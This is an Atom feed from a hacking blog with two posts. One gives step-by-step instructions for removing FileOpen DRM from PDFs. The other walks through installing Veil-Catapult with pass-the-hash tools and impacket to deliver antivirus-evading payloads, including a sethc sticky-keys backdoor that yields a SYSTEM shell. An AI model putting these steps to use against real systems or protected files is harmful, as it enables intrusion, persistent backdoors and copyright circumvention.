<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5662588500512873533</id><updated>2026-03-13T09:21:58.179+05:30</updated><category term="metasploit"/><category term="website hack"/><category term="UBUNTU"/><category term="hacking tools"/><category term="remote computer hacking"/><category term="TRICK"/><category term="hack"/><category term="S.E.T."/><category term="post-exploitation"/><category term="Information Gathering"/><category term="bypass AV"/><category term="password crack"/><category term="DOS attack"/><category term="WINDOWS TIPS"/><category term="i.p address"/><category term="Batch Virus"/><category term="password hack"/><category term="windows7 password crack"/><category term="authentication-bypass"/><category term="dns-spoof"/><category term="path traversal"/><category term="wordpress"/><category term="Brute Force"/><category term="email spoofing"/><category term="mutillidae"/><category term="BSNL"/><category term="Burpe"/><category term="DRM PROTECTION REMOVAL"/><category term="Free E-Books"/><category term="MAC spoof"/><category term="RELIANCE"/><category term="Username Enumeration"/><category term="Veil error"/><category term="Veil-Catapult"/><category term="WIFI-JAMMER"/><category term="XPATH Injection"/><category term="coldfusion"/><category term="crack software"/><category term="decrypt password"/><category term="encrypt data"/><category term="find person through email"/><category term="i.p. spoof"/><category term="keylogger"/><category term="ssh"/><category term="trial mode"/><category term="watermark remove"/><category term="websploit"/><category term="wireshark"/><title type='text'>Hacking &amp;amp; Tricks</title><subtitle type='html'>A Blog About Hacking &amp;amp; Computer Security</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default?start-index=26&amp;max-results=25'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>165</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-3114152972442330262</id><published>2024-12-31T16:23:00.003+05:30</published><updated>2024-12-31T16:31:58.640+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="DRM PROTECTION REMOVAL"/><title type='text'>How to Remove FileOpen DRM Protection from PDF?</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;If you want to remove FileOpen DRM protection from a PDF, follow these steps. Note that this method will only work on a system that already has the necessary permissions to open the DRM-protected PDF.&lt;/span&gt;&lt;/p&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;Manual Method-&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;p&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;background-color: white; color: #131313;&quot;&gt;Download De_DRM_tools from&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #131313;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #131313;&quot;&gt;&lt;a href=&quot;https://github.com/apprenticeharper/DeDRM_tools&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;background-color: white; color: #131313;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Unzip De_DRM_tools-master.zip&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Within the new folder DeDRM_tools-master, navigate to \Other_Tools\Tetrachroma_FileOpen_ineptpdf&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Right click and open the file ineptpdf_8.4.51.pyw&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;h3 style=&quot;background-color: white; color: #131313; margin-bottom: 1rem; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;Additional files to install are-&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;1)Python 2.7 download &lt;a href=&quot;https://www.python.org/ftp/python/2.7.17/python-2.7.17.msi&quot;&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;2)PyCrypto&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;3)PyWin extension&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;4)FileOpen plugin&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Open Command Line in the folder C:\Python27\Scripts -&amp;gt; This can be done by navigating to C:\Python27, hold shift, right click on Scripts and press &#39;Open command window here&#39;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisYYgv-gXNQAFTTrVPBIxQ_GrjQZS1hAiJ54EdklACtELuAQy-L-HlQwUs--iiXLd_YFXDYlXxBNBxoA-kJQ7yLoBgE9dmOXhGQ4T4xyi2LPjXGVCuwmr9SBbssIjHFBCtUsHotP2gCoFaR_moXIpdAAYYqzBdbpsbHjC3HW_0cWI_FK1wznojriYdNnZg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;385&quot; data-original-width=&quot;1901&quot; height=&quot;124&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisYYgv-gXNQAFTTrVPBIxQ_GrjQZS1hAiJ54EdklACtELuAQy-L-HlQwUs--iiXLd_YFXDYlXxBNBxoA-kJQ7yLoBgE9dmOXhGQ4T4xyi2LPjXGVCuwmr9SBbssIjHFBCtUsHotP2gCoFaR_moXIpdAAYYqzBdbpsbHjC3HW_0cWI_FK1wznojriYdNnZg=w609-h124&quot; width=&quot;609&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;•To install PyCrypto, type pip install pycryptodome&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• To install the PyWin extension, type pip install pywin32&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• To install the FileOpen plugin, go to&amp;nbsp;&lt;a class=&quot;relative pointer-events-auto a cursor-pointer underline&quot; href=&quot;https://plugin.fileopen.com/&quot; rel=&quot;noopener nofollow ugc&quot; rpl=&quot;&quot; style=&quot;cursor: pointer; margin-bottom: 0px; margin-top: 0px; pointer-events: auto; position: relative;&quot; target=&quot;_blank&quot;&gt;https://plugin.fileopen.com/&lt;/a&gt;&amp;nbsp;and install the latest version&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Navigate back to the folder C:\Users\XX\Downloads\DeDRM_tools-master\Other_Tools\Tetrachroma_FileOpen_ineptpdf&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Right click on ineptpdf_8.4.51.pyw&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Navigate to line 2285 and change the value of x in &#39;self.fileopen[&#39;Build&#39;]=&#39;x&#39; to the build number as shown on the FileOpen plugin page (Windows Installer link)&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuf8OlPN7WLuMLWlejJS4W3TJoiHJowSQ5WF7gh-xNxdhb-Sd3hQHocUxI94Nd7z_p9OzKPNdYzEZDwP8-oU_zcNdpa1mc67vgFjyCJF1nB1R73LmfKO8D_mPHrJo9g3NV4trJcA61LNTBTw4ClEtpJlITy_zLy5GrWYUHSxx5CBvTtX4qgD5fxqnfgGA_&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;565&quot; data-original-width=&quot;1274&quot; height=&quot;142&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuf8OlPN7WLuMLWlejJS4W3TJoiHJowSQ5WF7gh-xNxdhb-Sd3hQHocUxI94Nd7z_p9OzKPNdYzEZDwP8-oU_zcNdpa1mc67vgFjyCJF1nB1R73LmfKO8D_mPHrJo9g3NV4trJcA61LNTBTw4ClEtpJlITy_zLy5GrWYUHSxx5CBvTtX4qgD5fxqnfgGA_&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Double click on ineptpdf_8.4.51.pyw&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Ignore the Password or Key file box, press the dots to add an input file, type the name of the decrypted output file and press decrypt.&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 1rem;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhdycnmwE-ZNh90CCvTAppnRsYRmvi3fcGyHxiqpPlQNCjIA3w7m80Jel4RODJirg7bbks1cTdJ6raf8RiA56B1HGL11nkiJMwYdTZ9BJGWvQxSAlgtfvLG3tgYSobSUwMBMSw6rOeKxlQAAa4x8wLntGK-VRVEIfVbUh67CcZMLTUoXBJCAoW-9oMxIrU3&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;341&quot; data-original-width=&quot;545&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhdycnmwE-ZNh90CCvTAppnRsYRmvi3fcGyHxiqpPlQNCjIA3w7m80Jel4RODJirg7bbks1cTdJ6raf8RiA56B1HGL11nkiJMwYdTZ9BJGWvQxSAlgtfvLG3tgYSobSUwMBMSw6rOeKxlQAAa4x8wLntGK-VRVEIfVbUh67CcZMLTUoXBJCAoW-9oMxIrU3&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 0px;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;• Decrypted file will appear at C:\Users\XX\Downloads\DeDRM_tools-master\Other_Tools\Tetrachroma_FileOpen_ineptpdf&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white; color: #131313; margin-bottom: 0px;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white; color: #131313; margin-bottom: 0px; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;If you required exe file &amp;amp; dont want to install python &amp;amp; dependency , just comment here, I will share the same.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3114152972442330262/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2024/12/how-to-remove-fileopen-drm-protection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3114152972442330262'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3114152972442330262'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2024/12/how-to-remove-fileopen-drm-protection.html' title='How to Remove FileOpen DRM Protection from PDF?'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEisYYgv-gXNQAFTTrVPBIxQ_GrjQZS1hAiJ54EdklACtELuAQy-L-HlQwUs--iiXLd_YFXDYlXxBNBxoA-kJQ7yLoBgE9dmOXhGQ4T4xyi2LPjXGVCuwmr9SBbssIjHFBCtUsHotP2gCoFaR_moXIpdAAYYqzBdbpsbHjC3HW_0cWI_FK1wznojriYdNnZg=s72-w609-h124-c" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-687479999248679230</id><published>2014-02-09T01:34:00.003+05:30</published><updated>2014-02-09T02:07:51.999+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="bypass AV"/><category scheme="http://www.blogger.com/atom/ns#" term="Veil-Catapult"/><title type='text'>How to install and use Veil-Catapult in backtrack?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install Veil-Catapult in backtrack?
&lt;br /&gt;
&lt;br /&gt;
First if you have not already installed &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot;&gt;veil-evasion&lt;/a&gt; framework then first install it as mentioned &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot;&gt;here&lt;/a&gt;.After installing Veil-evasion follow steps.
&lt;br /&gt;
&lt;br /&gt;
root@bt:~wget https://github.com/Veil-Framework/Veil-Catapult/archive/master.zip
&lt;br /&gt;
&lt;br /&gt;
root@bt:~unzip master.zip&amp;nbsp;
&lt;br /&gt;
&lt;br /&gt;
root@bt:~cd Veil-Catapult-master/
&lt;br /&gt;
&lt;br /&gt;
root@bt:~sh setup.sh
&lt;br /&gt;
&lt;br /&gt;
Now veil-catapult require impacket library &amp;amp; passing the hash toolkit.So setup script try to install PTH suite but we got error.So we have to manually do it.
&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Install passing the hash.
&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
root@bt:~wget https://passing-the-hash.googlecode.com/files/wmiPTH-1.0-1.deb
&lt;br /&gt;
&lt;br /&gt;
root@bt:~wget https://passing-the-hash.googlecode.com/files/winexePTH1.1.0-1.deb
&lt;br /&gt;
&lt;br /&gt;
root@bt:~dpkg -i winexePTH1.1.0-1.deb
&lt;br /&gt;
&lt;br /&gt;
root@bt:~dpkg -i wmiPTH-1.0-1.deb
&lt;br /&gt;
&lt;br /&gt;
If you are using other OS then you have to manually build it as mentioned &lt;a href=&quot;http://passing-the-hash.blogspot.in/2012/07/building-pth-suite-post-install.html&quot;&gt;here&lt;/a&gt; .
&lt;br /&gt;
&lt;br /&gt;
It installed into the /opt/pth/bin folder , we have to move it into /usr/bin.
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# ln -s /opt/pth/bin/wmis /usr/bin/pth-wmis
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# ln -s /opt/pth/bin/winexe /usr/bin/pth-winexe
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# ln -s /opt/pth/bin/wmic /usr/bin/pth-wmic
&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;
Installing impacket library
&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
root@bt:~# wget http://corelabs.coresecurity.com/index.php?module=Wiki&amp;amp;action=attachment&amp;amp;type=tool&amp;amp;page=Impacket&amp;amp;file=impacket-0.9.11.tar.gz
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# tar -xvzf impacket-0.9.11.tar.gz&amp;nbsp;
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# cd impacket
&lt;br /&gt;
&lt;br /&gt;
root@bt:~# python setup.py build&amp;nbsp;
&lt;br /&gt;
&lt;br /&gt;
I know you have question that we can install it , but when we tried to install , it&amp;nbsp; installed succesfully ;but some of modules are missing.So we first gonna build it then copy it. Now copy folder impacket from build/lib.linux-i686-2.6/ and paste it into /usr/lib/pymodules/python2.6&amp;nbsp;
&lt;br /&gt;
&lt;br /&gt;
Now everything is ready ,we can run it. Before that open /etc/veil/settings.py and checkout all path.
&lt;br /&gt;
&lt;br /&gt;
root@bt:~/Veil-Catapult-master# python Veil-Catapult.py&amp;nbsp;
&lt;br /&gt;
&lt;br /&gt;
Now select number according to your choice &amp;amp; fill out necessary option.
&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Powershell injector
&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3S2kzn-5H0xK9HHRFGuHrtlKhfzLuYZ7h4L_UJpl_buHam52jHxdt6wnKq7wnI__0nNuUAsBeoPgttmQb9saaBVW-kZZPyaVvxmZ-ZzmPijuB4lYLvlr7XNRz3_151AakLTqPbFk4ZHY/s1600/Screenshot-1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;powershell-injector&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3S2kzn-5H0xK9HHRFGuHrtlKhfzLuYZ7h4L_UJpl_buHam52jHxdt6wnKq7wnI__0nNuUAsBeoPgttmQb9saaBVW-kZZPyaVvxmZ-ZzmPijuB4lYLvlr7XNRz3_151AakLTqPbFk4ZHY/s1600/Screenshot-1.png&quot; height=&quot;43&quot; title=&quot;powershell-injector&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Barebones python injector
&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTGCrLXnoYYHRGm1eQmiYiYoI1eeG55lRG0FYaMCVrrDQAwPYkKxpIXZdUGk5zD63Ph3LIAb8F4G4NNY_RpV1IKbojwSR1SjfE7q0wziWZqBoL61pS6haDpnydMFtHt1wZt5ETrDW79Jnj/s1600/Screenshot-2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Barebones-Python-Injection&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTGCrLXnoYYHRGm1eQmiYiYoI1eeG55lRG0FYaMCVrrDQAwPYkKxpIXZdUGk5zD63Ph3LIAb8F4G4NNY_RpV1IKbojwSR1SjfE7q0wziWZqBoL61pS6haDpnydMFtHt1wZt5ETrDW79Jnj/s1600/Screenshot-2.png&quot; height=&quot;43&quot; title=&quot;Barebones-Python-Injection&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Sethc backdoor&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMyVnJFV03TNscHHvJu-pW0WPfVIngqLXeJyfi1L0v1emBFjQ21BGYG-PW3UL-A-qgCkVplJhzyEFcm27t5KJdEbHSs0HhO0_18sNYb8YRb2MLR30uIfK-MkCbiXKJpwZNgIxgPu_dgt2C/s1600/Screenshot.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMyVnJFV03TNscHHvJu-pW0WPfVIngqLXeJyfi1L0v1emBFjQ21BGYG-PW3UL-A-qgCkVplJhzyEFcm27t5KJdEbHSs0HhO0_18sNYb8YRb2MLR30uIfK-MkCbiXKJpwZNgIxgPu_dgt2C/s1600/Screenshot.png&quot; height=&quot;190&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Reboot, hit Shift key 5 times, SYSTEM shell will pop up. Also there is &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html&quot;&gt;script&lt;/a&gt; for it in metasploit.Check it out this awesome &lt;a href=&quot;http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html&quot;&gt;blog&lt;/a&gt; for more details.&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
EXE delivery upload&amp;nbsp; &lt;/h3&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOg5Q0oTaGZzx_ZG2z8g8-sVgF_wTXnGjFvgs_LzTCv4hdRA9KQroboBuuDtvJFjnn-fLpMZfxRAsL6x-EjRtoF5-hJTlS0qzIs8rIAbry-cwg7XaAPa8e3a3Vfj3XmUnTcBpDBPCj0SFW/s1600/Screenshot-4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;exe-deliver&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOg5Q0oTaGZzx_ZG2z8g8-sVgF_wTXnGjFvgs_LzTCv4hdRA9KQroboBuuDtvJFjnn-fLpMZfxRAsL6x-EjRtoF5-hJTlS0qzIs8rIAbry-cwg7XaAPa8e3a3Vfj3XmUnTcBpDBPCj0SFW/s1600/Screenshot-4.png&quot; height=&quot;108&quot; title=&quot;exe-deliver&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5uZ4KpMuETRbjuOGzRqnQyyOVzDGiJv4-UASZNdwAQaLrSVyDKFinBK-SFelS77fo9bmoa9SI7SR6j4Vn53otUxwy5U6Tt_sn8pVgeSUYXJp_OV4UeQWilggxsTEV973k6-rF-4LJiJuL/s1600/Screenshot-6.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;veil-catapult-exe-upload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5uZ4KpMuETRbjuOGzRqnQyyOVzDGiJv4-UASZNdwAQaLrSVyDKFinBK-SFelS77fo9bmoa9SI7SR6j4Vn53otUxwy5U6Tt_sn8pVgeSUYXJp_OV4UeQWilggxsTEV973k6-rF-4LJiJuL/s1600/Screenshot-6.png&quot; height=&quot;110&quot; title=&quot;veil-catapult-exe-upload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Cleanup resource script is generated , you can use it after your work completed for kill process &amp;amp; remove exe.&lt;br /&gt;
